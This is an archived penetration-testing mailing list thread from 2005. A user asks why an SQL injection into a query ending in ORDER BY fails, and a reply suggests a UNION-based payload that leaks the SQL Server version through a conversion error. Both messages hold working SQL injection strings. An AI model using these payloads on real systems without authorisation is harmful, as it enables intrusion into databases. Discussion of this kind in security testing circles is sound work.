Penetration Testing: Re: sql injection with order by

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Penetration Testing mailing list archives

Re: sql injection with order by

From: "Chitresh Sen" <chitresh_sen () ftml net>
Date: Sun, 10 Apr 2005 18:57:17 -0700

Try This 

' union select convert(int, @@version), 1, 1, 1 --

On 8 Apr 2005 03:52:02 -0000, "dietf dietf" <dietf () yahoo com> said:



Hi all,
I am trying to make an injection with the statement below,

SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
CusID='%Customer%' ORDER BY Sira, ProjeTurID"

in the statement above I inject ")select @@version-- for the variable
Customer. But unless I have ended inject code with -- nothing happens.
I get
SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
FirmaID=")select @@version-- ORDER BY Sira, ProjeTurID"
what is the problem? can anybody tell me?
Is the problem occurs from the word ORDER BY?
Thanks

-- 
  Chitresh Sen
  chitresh_sen () ftml net

By Date By Thread

Current thread:

sql injection with order by dietf dietf (Apr 08)
- RE: sql injection with order by Ernest Nelson (Apr 10)
- Re: sql injection with order by Chitresh Sen (Apr 11)